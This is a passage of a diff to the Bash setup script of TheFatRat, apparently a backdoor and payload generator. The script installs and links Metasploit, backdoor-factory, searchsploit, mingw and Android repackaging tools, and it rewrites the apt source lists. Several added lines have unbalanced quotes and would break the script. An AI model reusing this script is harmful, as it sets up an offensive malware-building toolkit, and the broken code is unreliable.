/dev/null 2>&1 +ln -s $msfv/msfvenom /usr/local/sbin/msfvenom > /dev/null 2>&1 +echo "msfconsole" | tee -a $config $log > /dev/null 2>&1 +echo "msfvenom" | tee -a $config $log > /dev/null 2>&1 +bkf +;; + +2) +echo -e $yellow "[ ! ] Installing Metasploit-Framework " +xterm -T "☣ INSTALL METASPLOIT-FRAMEWORK ☣" -geometry 100x30 -e "sudo apt-get install metasploit-framework --force-yes -y" +echo -e $green "[ ✔ ] Done installing ...." +echo "msfconsole" | tee -a $config $log > /dev/null 2>&1 +echo "msfvenom" | tee -a $config $log > /dev/null 2>&1 +bkf +;; +*) +mtspl +;; +esac +fi +} + + +function cont() { + +stp="logs/check" +rm -rf $stp >/dev/null 2>&1 +touch $stp +echo "1" > $stp + #check if xterm is installed which xterm > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Xterm.............................[ found ]" which xterm >> $log 2>&1 -sleep 2 else echo "" echo -e $red "[ X ] xterm -> not found! " -sleep 2 echo -e $yellow "[ ! ] Installing Xterm " -sleep 2 echo -e $green "" sudo apt-get install xterm -y -clear -echo -e $green "[ ✔ ] Done installing .... " which xterm >> $log 2>&1 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Xterm -> OK" +else +echo "0" > $stp +fi fi +sleep 1 #check if dig its installed which dig > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Dns-Utils ........................[ found ]" which dig >> $log 2>&1 -sleep 2 else -echo "" echo -e $red "[ X ] dnsutils -> not found! " -sleep 2 echo -e $yellow "[ ! ] Installing dnsutils" xterm -T "☣ INSTALL DNSUTILS ☣" -geometry 100x30 -e "sudo apt-get install dnsutils -y" -echo -e $green "[ ✔ ] Done installing .... " which dig >> $log 2>&1 -fi - -#check if zenity its installed -which zenity > /dev/null 2>&1 if [ "$?" -eq "0" ]; then -echo -e $green "[ ✔ ] Zenity............................[ found ]" -which zenity >> $log 2>&1 -sleep 2 +echo -e $green "[ ✔ ] Dns-Utils -> OK" else -echo "" -echo -e $red "[ X ] zenity -> not found! " -sleep 2 -echo -e $yellow "[ ! ] Installing zenity " -xterm -T "☣ INSTALL ZENITY ☣" -geometry 100x30 -e "sudo apt-get install zenity -y" -echo -e $green "[ ✔ ] Done installing .... " -which zenity >> $log 2>&1 +echo "0" > $stp fi - +fi +sleep 1 # check if gcc exists which gcc > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Gcc compiler......................[ found ]" which gcc >> $log 2>&1 -sleep 2 else echo -e $red "[ X ] gcc compiler -> not found " echo -e $yellow "[ ! ] Installing gcc " xterm -T "☣ INSTALL GCC COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install gcc -y" -echo -e $green "[ ✔ ] Done installing .... " which gcc >> $log 2>&1 -sleep 2 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] GCC -> OK" +else +echo "0" > $stp fi - +fi +sleep 1 # check if monodevelop exists which monodevelop > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Monodevelop ......................[ found ]" which monodevelop >> $log 2>&1 -sleep 2 else echo -e $red "[ X ] Monodevelop -> not found " echo -e $yellow "[ ! ] Installing monodevelop " xterm -T "☣ INSTALL MONODEVELOP ☣" -geometry 100x30 -e "sudo apt-get install monodevelop -y" -echo -e $green "[ ✔ ] Done installing ...." which monodevelop >> $log 2>&1 -sleep 2 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Monodevelop -> OK" +else +echo "0" > $stp fi - +fi +sleep 1 #check if apache2 exists which apache2 > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Apache2 ..........................[ found ]" which apache2 >> $log 2>&1 -sleep 2 else echo -e $red "[ X ] Apache2 -> not found " echo -e $yellow "[ ! ] Installing apache2 " xterm -T "☣ INSTALL APACHE2 ☣" -geometry 100x30 -e "sudo apt-get install apache2 -y" -echo -e $green "[ ✔ ] Done installing ...." which apache2 >> $log 2>&1 -sleep 2 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Apache2 -> OK" +else +echo "0" > $stp fi - +fi +sleep 1 #check if gnome terminal exists #added this new install option because user may be running a distro that may not have gnome terminal installed by default #gnome terminal is used in main script to run searchsploit @@ -217,68 +360,74 @@ which gnome-terminal > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Gnome Terminal....................[ found ]" which gnome-terminal >> $log 2>&1 -sleep 2 else echo -e $red "[ X ] Gnome-terminal-> not found " echo -e $yellow "[ ! ] Installing gnome-terminal " xterm -T "☣ INSTALL GNOME-TERMINAL ☣" -geometry 100x30 -e "sudo apt-get install gnome-terminal -y" -echo -e $green "[ ✔ ] Done installing ...." which gnome-terminal >> $log 2>&1 -sleep 2 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Gnome Terminal -> OK" +else +echo "0" > $stp +fi fi #Checking if upx compressor exists +sleep 1 which upx > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] UPX Compressor....................[ found ]" which upx >> $log 2>&1 -sleep 2 else echo -e $red "[ X ] Upx compressor -> not found " echo -e $yellow "[ ! ] Installing upx-compressor " xterm -T "☣ INSTALL UPX COMPRESSOR ☣" -geometry 100x30 -e "sudo apt-get install upx-ucl -y" -echo -e $green "[ ✔ ] Done installing ...." which upx >> $log 2>&1 -sleep 2 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] UPX Compressor -> OK" +else +echo "0" > $stp fi - +fi +sleep 1 #Checking if Ruby exists which ruby > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Ruby..............................[ found ]" which ruby >> $log 2>&1 -sleep 2 else echo -e $red "[ X ] Ruby -> not found " echo -e $yellow "[ ! ] Installing Ruby " -xterm -T "☣ INSTALL Ruby ☣" -geometry 100x30 -e "sudo apt-get install ruby -y" -echo -e $green "[ ✔ ] Done installing ...." +xterm -T "☣ INSTALL Ruby ☣" -geometry 100x30 -e "sudo apt-get install ruby -y && gem install nokogiri" which ruby >> $log 2>&1 -sleep 2 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Ruby -> OK" +else +echo "0" > $stp fi - +fi +sleep 1 #Checking if Openssl exists which openssl > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Openssl...........................[ found ]" which openssl >> $log 2>&1 -sleep 2 else echo -e $red "[ X ] Openssl -> not found " echo -e $yellow "[ ! ] Installing Openssl " xterm -T "☣ INSTALL OPENSSL ☣" -geometry 100x30 -e "sudo apt-get install openssl -y" -echo -e $green "[ ✔ ] Done installing ...." which openssl >> $log 2>&1 -sleep 2 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Openssl -> OK" +else +echo "0" > $stp fi - +fi +sleep 1 #installing dependencies for ruby script -echo -e $green "[ ! ] Installing dedendencies for ruby script" -xterm -T "☣ INSTALL DEPENDENCIES ☣" -geometry 100x30 -e "sudo apt-get install zlib1g-dev libmagickwand-dev imagemagick -y" -echo -e $green "[ ✔ ] Done installing ...." -sleep 2 - -xterm -T "☣ INSTALL APKCREATION DEPENDENCIES ☣" -geometry 100x30 -e "sudo apt-get install lib32z1 lib32ncurses5 lib32stdc++6 -y" +echo -e $green "[ ! ] Installing tools dependencies" +xterm -T "☣ INSTALL DEPENDENCIES ☣" -geometry 100x30 -e "sudo apt-get install zlib1g-dev libmagickwand-dev imagemagick lib32z1 lib32ncurses5 lib32stdc++6 -y" +sleep 1 ################################# #inputrepo @@ -300,9 +449,9 @@ echo 'deb http://old.kali.org/kali sana main non-free contrib' >> /etc/apt/sourc echo 'deb-src http://old.kali.org/kali sana main non-free contrib' >> /etc/apt/sources.list echo 'deb http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list echo 'deb-src http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list -sleep 2 xterm -T "☣ UPDATING KALI REPO ☣" -geometry 100x30 -e "sudo apt-get update" >>$log 2>&1 +sleep 1 #Checking if Jarsigner exists which jarsigner > /dev/null 2>&1 if [ "$?" -eq "0" ]; then @@ -316,12 +465,13 @@ echo "** Configuration Paths for TheFatRat , do not delete anything from this fi echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config echo "********************************************************************************************************" >> $config echo "jarsigner" | tee -a $config >> /dev/null 2>&1 -sleep 2 else echo -e $red "[ X ] Jarsigner (java) -> not found " echo -e $yellow "[ ! ] Installing Java " xterm -T "☣ INSTALL OPENJDK-8 ☣" -geometry 100x30 -e "sudo apt-get install openjdk-8-jdk openjdk-8-jre --force-yes -y " -echo -e $green "[ ✔ ] Done installing ...." +which jarsigner > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Jarsigner -> OK" which jarsigner >> $log 2>&1 rm -f $config #Creating new config file @@ -331,8 +481,11 @@ echo "** Configuration Paths for TheFatRat , do not delete anything from this fi echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config echo "********************************************************************************************************" >> $config echo "jarsigner" | tee -a $config >> /dev/null 2>&1 -sleep 2 +else +echo "0" > $stp fi +fi +sleep 1 #Checking if Unzip exists which unzip > /dev/null 2>&1 @@ -340,91 +493,71 @@ if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Unzip.............................[ found ]" which unzip >> $log 2>&1 echo "unzip" | tee -a $config >> /dev/null 2>&1 -sleep 2 else echo -e $red "[ X ] Unzip -> not found " echo -e $yellow "[ ! ] Installing Unzip " xterm -T "☣ INSTALL UNZIP ☣" -geometry 100x30 -e "sudo apt-get install unzip --force-yes -y " -echo -e $green "[ ✔ ] Done installing ...." which unzip >> $log 2>&1 +if [ "$?" -eq "0" ]; then echo "unzip" | tee -a $config >> /dev/null 2>&1 -sleep 2 +echo -e $green "[ ✔ ] Unzip -> OK" +else +echo "0" > $stp +fi fi +sleep 1 #Checking if keytool exists which keytool > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Keytool (java)....................[ found ]" which keytool >> $log 2>&1 echo "keytool" | tee -a $config >> /dev/null 2>&1 -sleep 2 else echo -e $red "[ X ] Keytool (java) -> not found " echo -e $yellow "[ ! ] Installing Java " xterm -T "☣ INSTALL JAVA ☣" -geometry 100x30 -e "sudo apt-get install openjdk-8-jdk --force-yes -y " -echo -e $green "[ ✔ ] Done installing ...." which keytool >> $log 2>&1 +if [ "$?" -eq "0" ]; then echo "keytool" | tee -a $config >> /dev/null 2>&1 -sleep 2 +echo -e $green "[ ✔ ] Keytool -> OK" +else +echo "0" > $stp fi +fi + +sleep 1 #Adding zipalign path to config echo -e $green "[ ✔ ] Zipalign " echo "$path/tools/android-sdk/zipalign" >> $log 2>&1 echo "$path/tools/android-sdk/zipalign" | tee -a $config >> /dev/null 2>&1 -sleep 2 +sleep 1 #Adding Proguard path to config echo -e $green "[ ✔ ] Proguard " echo "$path/tools/proguard5.3.2/lib/proguard" >> $log 2>&1 echo "$path/tools/proguard5.3.2/lib/proguard" | tee -a $config >> /dev/null 2>&1 -sleep 2 +sleep 1 # check if mingw32 or mingw-64 exists case "$arch" in x86_64|aarch64) which i686-w64-mingw32-gcc > /dev/null 2>&1 if [ "$?" -eq "0" ]; then -echo -e $green "[ ✔ ] Mingw-w64 Compiler..................[ found ]" +echo -e $green "[ ✔ ] Mingw-w64 Compiler................[ found ]" which i686-w64-mingw32-gcc >> $log 2>&1 -sleep 2 +sleep 1 else echo -e $red "[ X ] mingw-w64 compiler -> not found " echo -e $yellow "[ ! ] Installing Mingw-64 " xterm -T "☣ INSTALL MINGW64 COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install mingw-w64 --force-yes -y" -which i686-w64-mingw32-gcc > /dev/null 2>&1 -if [ "$?" -eq "0" ]; then -echo -e $green "[ ✔ ] Done installing .... " which i686-w64-mingw32-gcc >> $log 2>&1 -sleep 2 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Mingw64 -> OK" else -echo -e $red "It was not possible to detect i686-w64-mingw32-gcc installed in your system ." -echo -e $yellow "One of these problems occured :" -echo "" -echo -e $blue "- Instalation from kali repository on your system failed" -echo "" -echo -e $blue "- You have a faulty installation of mingw-w64 in your system -(try : $green apt-get remove --purge mingw-w64 mingw32 -y && apt-get install -f -$blue and run setup again in fatrat folder ." -echo "" -echo -e $blue "- Your system is 64bit and you recently added into dpkg arch:i386 for some reason" -echo "" -echo -e $blue "- /usr/bin folder is not on your system path (not likely)" -echo "" -echo -e $yellow "Please report into issues on Fatrat github this error : ($arch)" -echo "" -echo -e $green "Press any key to continue" -read abo -echo -e $blue "Reactivating you original repositories" -rm -f /etc/apt/sources.list -mv /etc/apt/sources.list.backup /etc/apt/sources.list -#now we can remove the emergency backup securely -rm -f /etc/apt/sources.list.fatrat -apt-get clean -xterm -T "☣ UPDATE YOUR REPO ☣" -geometry 100x30 -e "sudo apt-get update " -clear -exit 0 +echo "0" > $stp fi fi ;; @@ -433,43 +566,16 @@ which i586-mingw32msvc-gcc > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Mingw32 Compiler..................[ found ]" which i586-mingw32msvc-gcc >> $log 2>&1 -sleep 2 +sleep 1 else echo -e $red "[ X ] mingw32 compiler -> not found " echo -e $yellow "[ ! ] Installing Mingw32 " xterm -T "☣ INSTALL MINGW32 COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install mingw32 --force-yes -y" -which i586-mingw32msvc-gcc > /dev/null 2>&1 -if [ "$?" -eq "0" ]; then -echo -e $green "[ ✔ ] Done installing .... " which i586-mingw32msvc-gcc >> $log 2>&1 -sleep 2 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Mingw32 -> OK" else -echo -e $red "It was not possible to detect i586-mingw32msvc-gcc installed in your system ." -echo -e $yellow "One of these problems occured :" -echo "" -echo -e $blue "- Instalation from kali repository on your system failed" -echo "" -echo -e $blue "- You have a faulty installation of mingw32 in your system -(try : $green apt-get remove --purge mingw32 mingw-w64 -y && apt-get install -f -$blue and run setup again in fatrat folder ." -echo "" -echo -e $blue "- Your system is 32bit and you recently added into dpkg arch:x64 for some reason" -echo "" -echo -e $blue "- /usr/bin folder is not on your system path (not likely)" -echo "" -echo -e $yellow "Please report into issues on Fatrat github this error : ($arch)" -echo "" -echo -e $green "Press any key to continue" -read abo -echo -e $blue "Reactivating you original repositories" -rm -f /etc/apt/sources.list -mv /etc/apt/sources.list.backup /etc/apt/sources.list -#now we can remove the emergency backup securely -rm -f /etc/apt/sources.list.fatrat -apt-get clean -xterm -T "☣ UPDATE YOUR REPO ☣" -geometry 100x30 -e "sudo apt-get update " -clear -exit 0 +echo "0" > $stp fi fi ;; @@ -492,74 +598,133 @@ exit 0 esac #Adding Dx & Aapt path to config -which aapt > /dev/null 2>&1 +which dx > /dev/null 2>&1 if [ "$?" -eq "0" ]; then -echo -e $red "[ X ] Aapt..........................." - -# Removing current installed aapt version on user system and setting aapt 25.0.2 in thirdparty tools -# This must be done because apktool 2.2.2 will conflict with an old aapt version on building apk files -# Aapt is not a variable that could be set automatically , calls to aapt are made by apktool internally -xterm -T "☣ Removing Your Current Aapt ☣" -geometry 100x30 -e "sudo apt-get remove --purge aapt -y" >>$log 2>&1 -unlink /usr/local/sbin/aapt > /dev/null 2>&1 -unlink /usr/bin/aapt > /dev/null 2>&1 -ln -s $path/tools/android-sdk/aapt /usr/local/sbin/aapt > /dev/null 2>&1 -echo -e $green "[ ✔ ] Dx & Aapt" -echo "$path/tools/android-sdk/dx" >> $log 2>&1 -echo "$path/tools/android-sdk/dx" | tee -a $config >> /dev/null 2>&1 -echo "$path/tools/android-sdk/aapt" >> $log 2>&1 -echo "$path/tools/android-sdk/aapt" | tee -a $config >> /dev/null 2>&1 -sleep 2 +dxg=`dx --version 2>&1 | tee temp/dx` +dxv=`cat temp/dx | awk '{print $3}'` +case $dxv in +1.8) +rm -rf temp/dx >/dev/null 2>&1 +which dx >> $log 2>&1 +echo "dx" | tee -a $config >> /dev/null 2>&1 +echo -e $green "[ ✔ ] DX 1.8" +;; +*) +xterm -T "☣ Removing Your Current DX ☣" -geometry 100x30 -e "sudo apt-get remove --purge dx -y" >>$log 2>&1 +ln -s "$path/tools/android-sdk/dx" "/usr/local/sbin/dx" > /dev/null 2>&1 +which dx > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +which dx >> $log 2>&1 +echo "dx" | tee -a $config >> /dev/null 2>&1 +echo -e $green "[ ✔ ] DX 1.8" else -echo -e $green "[ ✔ ] Dx & Aapt" -echo "$path/tools/android-sdk/dx" >> $log 2>&1 -echo "$path/tools/android-sdk/dx" | tee -a $config >> /dev/null 2>&1 -echo "$path/tools/android-sdk/aapt" >> $log 2>&1 -echo "$path/tools/android-sdk/aapt" | tee -a $config >> /dev/null 2>&1 -ln -s $path/tools/android-sdk/aapt /usr/local/sbin/aapt > /dev/null 2>&1 -sleep 2 +echo -e $red "[ x ] DX 1.8" +echo "0" > $stp +fi +;; +esac +else +ln -s "$path/tools/android-sdk/dx" "/usr/local/sbin/dx" > /dev/null 2>&1 +which dx > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +which dx >> $log 2>&1 +echo "dx" | tee -a $config >> /dev/null 2>&1 +echo -e $green "[ ✔ ] DX 1.8" +else +echo -e $red "[ x ] DX 1.8" +echo "0" > $stp +fi fi +which aapt > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +aptv=`aapt v | awk '{print $5}'` +case $aptv in +v0.2-3821160) +which aapt >> $log 2>&1 +echo "aapt" | tee -a $config >> /dev/null 2>&1 +echo -e $green "[ ✔ ] Aapt v0.2-3821160" +;; +*) +xterm -T "☣ Removing Your Current Aapt ☣" -geometry 100x30 -e "sudo apt-get remove --purge aapt -y" >>$log 2>&1 +ln -s "$path/tools/android-sdk/aapt" "/usr/local/sbin/aapt" > /dev/null 2>&1 +which aapt > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +which aapt >> $log 2>&1 +echo "aapt" | tee -a $config >> /dev/null 2>&1 +echo -e $green "[ ✔ ] Aapt v0.2-3821160" +else +echo -e $red "[ x ] Aapt v0.2-3821160" +echo "0" > $stp +fi +;; +esac +else +ln -s "$path/tools/android-sdk/aapt" "/usr/local/sbin/aapt" > /dev/null 2>&1 +which aapt > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +which aapt >> $log 2>&1 +echo "aapt" | tee -a $config >> /dev/null 2>&1 +echo -e $green "[ ✔ ] Aapt v0.2-3821160" +else +echo -e $red "[ x ] Aapt v0.2-3821160" +echo "0" > $stp +fi +fi #Adding Apktool path to config +which apktool > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +apk=`apktool | sed -n 1p | awk '{print $2}'` > /dev/null 2>&1 +case $apk in +v.2.2.2) +which apktool >> $log 2>&1 +echo "apktool" | tee -a $config >> /dev/null 2>&1 +echo -e $green "[ ✔ ] Apktool v.2.2.2" +;; +*) xterm -T "☣ REMOVE OLD APKTOOL ☣" -geometry 100x30 -e "sudo apt-get remove --purge apktool -y" -echo -e $green "[ ✔ ] Apktool 2.2.2 " -echo "$path/tools/apktool2.2.2/apktool" >> $log 2>&1 -echo "$path/tools/apktool2.2.2/apktool" | tee -a $config >> /dev/null 2>&1 -unlink /usr/local/sbin/apktool > /dev/null 2>&1 -unlink /usr/bin/apktool > /dev/null 2>&1 -ln -s $path/tools/apktool2.2.2/apktool /usr/local/sbin/apktool > /dev/null 2>&1 -sleep 2 +ln -s "$path/tools/apktool2.2.2/apktool" "/usr/local/sbin/apktool" > /dev/null 2>&1 +which apktool > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Apktool v.2.2.2" +which apktool >> $log 2>&1 +echo "apktool" | tee -a $config >> /dev/null 2>&1 +else +echo -e $red "[ x ] Apktool v.2.2.2" +echo "0" > $stp +fi +;; +esac +else +ln -s "$path/tools/apktool2.2.2/apktool" "/usr/local/sbin/apktool" > /dev/null 2>&1 +which apktool > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +which apktool >> $log 2>&1 +echo "apktool" | tee -a $config >> /dev/null 2>&1 +echo -e $green "[ ✔ ] Apktool v.2.2.2" +else +echo -e $red "[ x ] Apktool v.2.2.2" +echo "0" > $stp +fi +fi -# Removing current installed dex2jar version on user system and setting dex2jar in thirdparty tools -# Current kali repo uses version 0.95 version while dex2jar it is already in 2.0 version -echo -e $green "[ * ] Removing any old installed version from dex2jar from your system" -sleep 2 -xterm -T "☣ Removing Your Current Dex2Jar ☣" -geometry 100x30 -e "sudo apt-get remove --purge dex2jar -y" >>$log 2>&1 -unlink /usr/local/sbin/d2j-baksmali > /dev/null 2>&1 -unlink /usr/local/sbin/d2j-dex-recompute-checksum > /dev/null 2>&1 -unlink /usr/local/sbin/d2j-dex2jar > /dev/null 2>&1 -unlink /usr/local/sbin/d2j-dex2smali > /dev/null 2>&1 -unlink /usr/local/sbin/d2j-jar2dex > /dev/null 2>&1 -unlink /usr/local/sbin/d2j-jar2jasmin > /dev/null 2>&1 -unlink /usr/local/sbin/d2j-jasmin2jar > /dev/null 2>&1 -unlink /usr/local/sbin/d2j-smali > /dev/null 2>&1 -unlink /usr/local/sbin/d2j-std-apk > /dev/null 2>&1 -unlink /usr/bin/d2j-baksmali > /dev/null 2>&1 -unlink /usr/bin/d2j-dex-recompute-checksum > /dev/null 2>&1 -unlink /usr/bin/d2j-dex2jar > /dev/null 2>&1 -unlink /usr/bin/d2j-dex2smali > /dev/null 2>&1 -unlink /usr/bin/d2j-jar2dex > /dev/null 2>&1 -unlink /usr/bin/d2j-jar2jasmin > /dev/null 2>&1 -unlink /usr/bin/d2j-jasmin2jar > /dev/null 2>&1 -unlink /usr/bin/d2j-smali > /dev/null 2>&1 -unlink /usr/bin/d2j-std-apk > /dev/null 2>&1 -rm /usr/bin/d2j-* > /dev/null 2>&1 -rm /usr/sbin/d2j-* > /dev/null 2>&1 -rm /usr/local/bin/d2j-* > /dev/null 2>&1 -rm /usr/local/sbin/d2j-* > /dev/null 2>&1 -echo -e $green "[ * ] Manually Installing Dex2Jar 2.0 " +which d2j-dex2jar > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +dex=`d2j-dex2jar 2>&1 | tee temp/dex` +d2j=`cat temp/dex | sed -n 19p | awk '{print $2}' | cut -f1 -d','` +case $d2j in +reader-2.0) +rm -rf temp/dex >/dev/null 2>&1 +which d2j-dex2jar >> $log 2>&1 +echo "d2j-dex2jar" | tee -a $config >> /dev/null 2>&1 +echo -e $green "[ ✔ ] Dex2Jar 2.0" +;; +*) +rm -rf temp/dex >/dev/null 2>&1 +xterm -T "☣ Removing Your Current Dex2Jar ☣" -geometry 100x30 -e "sudo apt-get remove --purge dex2jar --force-yes -y" cp $path/tools/dex2jar/* /usr/local/sbin/ > /dev/null 2>&1 -chmod +x /usr/local/sbin/d2j-baksmali > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-baksmali" > /dev/null 2>&1 chmod +x /usr/local/sbin/d2j-dex-recompute-checksum > /dev/null 2>&1 chmod +x /usr/local/sbin/d2j-dex2jar > /dev/null 2>&1 chmod +x /usr/local/sbin/d2j-dex2smali > /dev/null 2>&1 @@ -570,152 +735,43 @@ chmod +x /usr/local/sbin/d2j-smali > /dev/null 2>&1 chmod +x /usr/local/sbin/d2j-std-apk > /dev/null 2>&1 rm -rf /usr/local/share/dex2jar > /dev/null 2>&1 mkdir /usr/local/share/dex2jar > /dev/null 2>&1 -cp -r $path/tools/dex2jar/lib /usr/local/share/dex2jar/lib > /dev/null 2>&1 +cp -r $path/tools/dex2jar/lib "/usr/local/share/dex2jar/lib > /dev/null 2>&1 which d2j-dex2jar > /dev/null 2>&1 if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Dex2Jar 2.0" which d2j-dex2jar >> $log 2>&1 echo "d2j-dex2jar" | tee -a $config >> /dev/null 2>&1 -echo -e $green "[ ✔ ] Dex2Jar 2.0 Installed " -sleep 2 else -echo -e $red "" -echo "There was an issue installing dex2jar in your system , aborting" -sleep 2 -exit 1 +echo -e $red "[ x ] Dex2Jar 2.0" +echo "0" > $stp fi - -# check if metasploit-framework its installed -which msfconsole > /dev/null 2>&1 -if [ "$?" -eq "0" ]; then -echo -e $green "[ ✔ ] Metasploit-Framework..............[ found ]" -echo "msfconsole" | tee -a $config $log >> /dev/null 2>&1 -echo "msfvenom" | tee -a $config $log >> /dev/null 2>&1 -sleep 2 -else -echo "" -echo -e $red "[ X ] metasploit-framework -> not found " - -# Providing manual input to user in case metasploit was installed from git and is not on system path - -q1=$(zenity --list --radiolist --column "Pick" --column "Action" TRUE "Setup Metasploit path manually" FALSE "Install Metasploit from Repository" FALSE "Use default config" --text="`printf "Metasploit-Framework was not detected in your system path ! \n Choose one of the options bellow ."`"); -case $q1 in - -"Setup Metasploit path manually") - -minpm=$(zenity --entry --title="Metasploit Path Manual Input" --width=100 --height=100 --text="Write the location of your Metasploit Path?" --entry-text="/opt/metasploit-framework"); -ret=$? - -if [ $ret = "0" ]; then -#Creation of symlinks to metasploit manual path in /usr/local/sbin to avoid changes in fatrat scripts - -unlink /usr/local/sbin/msfconsole > /dev/null 2>&1 -unlink /usr/local/sbin/msfvenom > /dev/null 2>&1 -ln -s $minpm/msfconsole /usr/local/sbin/msfconsole > /dev/null 2>&1 -ln -s $minpm/msfvenom /usr/local/sbin/msfvenom > /dev/null 2>&1 -echo "msfconsole" | tee -a $config $log > /dev/null 2>&1 -echo "msfvenom" | tee -a $config $log > /dev/null 2>&1 -fi - -if [ $ret = "1" ]; then -echo "msfconsole" | tee -a $config $log > /dev/null 2>&1 -echo "msfvenom" | tee -a $config $log > /dev/null 2>&1 -fi -;; - -"Install Metasploit from Repository") -echo -e $yellow "[ ! ] Installing Metasploit-Framework " -xterm -T "☣ INSTALL METASPLOIT-FRAMEWORK ☣" -geometry 100x30 -e "sudo apt-get install metasploit-framework --force-yes -y" -echo -e $green "[ ✔ ] Done installing ...." -echo "msfconsole" | tee -a $config $log > /dev/null 2>&1 -echo "msfvenom" | tee -a $config $log > /dev/null 2>&1 -;; -"Use default config")cd -echo "msfconsole" | tee -a $config $log > /dev/null 2>&1 -echo "msfvenom" | tee -a $config $log > /dev/null 2>&1 ;; esac -fi -# Check if backdoor-factory exists - -which backdoor-factory > /dev/null 2>&1 -if [ "$?" -eq "0" ]; then -echo -e $green "[ ✔ ] Backdoor-Factory..................[ found ]" -echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1 -sleep 2 else -echo -e $red "[ X ] backdoor-factory -> not found " -echo "" - -q2=$(zenity --list --radiolist --column "Pick" --column "Action" TRUE "Setup Backdoor-Factory path manually" FALSE "Install Backdoor-Factory from Repository" FALSE "Use default config" --text="`printf "Backdoor-Factory was not detected in your system path ! \n Choose one of the options bellow ."`"); -case $q2 in - -"Setup Backdoor-Factory path manually") -minpb=$(zenity --entry --title="Backdoor-Factory Path Manual Input" --width=100 --height=100 --text="Write the location of your Backdoor-Factory Path?" --entry-text="/opt/backdoor-factory/backdoor.py"); -ret=$? - -if [ $ret = "0" ]; then -echo "python2 $minpb" | tee -a $config $log > /dev/null 2>&1 -fi - -if [ $ret = "1" ]; then -echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1 -fi -;; - -"Install Backdoor-Factory from Repository") -echo -e $yellow "[ ! ] Installing backdoor-factory " -xterm -T "☣ INSTALL BACKDOOR-FACTORY ☣" -geometry 100x30 -e "sudo apt-get install backdoor-factory --force-yes -y" -echo -e $green "[ ✔ ] Done installing ...." -echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1 -;; - -"Use default config") -echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1 -;; -esac -fi -# check if searchsploit exists - -which searchsploit > /dev/null 2>&1 +cp $path/tools/dex2jar/* /usr/local/sbin/ > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-baksmali" > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-dex-recompute-checksum > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-dex2jar > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-dex2smali > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-jar2dex > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-jar2jasmin > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-jasmin2jar > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-smali > /dev/null 2>&1 +chmod +x /usr/local/sbin/d2j-std-apk > /dev/null 2>&1 +rm -rf /usr/local/share/dex2jar > /dev/null 2>&1 +mkdir /usr/local/share/dex2jar > /dev/null 2>&1 +cp -r $path/tools/dex2jar/lib "/usr/local/share/dex2jar/lib > /dev/null 2>&1 +which d2j-dex2jar > /dev/null 2>&1 if [ "$?" -eq "0" ]; then -echo -e $green "[ ✔ ] Searchsploit......................[ found ]" -echo "searchsploit" | tee -a $config $log > /dev/null 2>&1 -sleep 2 +echo -e $green "[ ✔ ] Dex2Jar 2.0" +which d2j-dex2jar >> $log 2>&1 +echo "d2j-dex2jar" | tee -a $config >> /dev/null 2>&1 else -echo -e $red "[ X ] searchsploit -> not found" -echo "" -q3=$(zenity --list --radiolist --column "Pick" --column "Action" TRUE "Setup Searchsploit path manually" FALSE "Install Searchsploit from Repository" FALSE "Use default config" --text="`printf "Searchsploit was not detected in your system path ! \n Choose one of the options bellow ."`"); -case $q3 in - -"Setup Searchsploit path 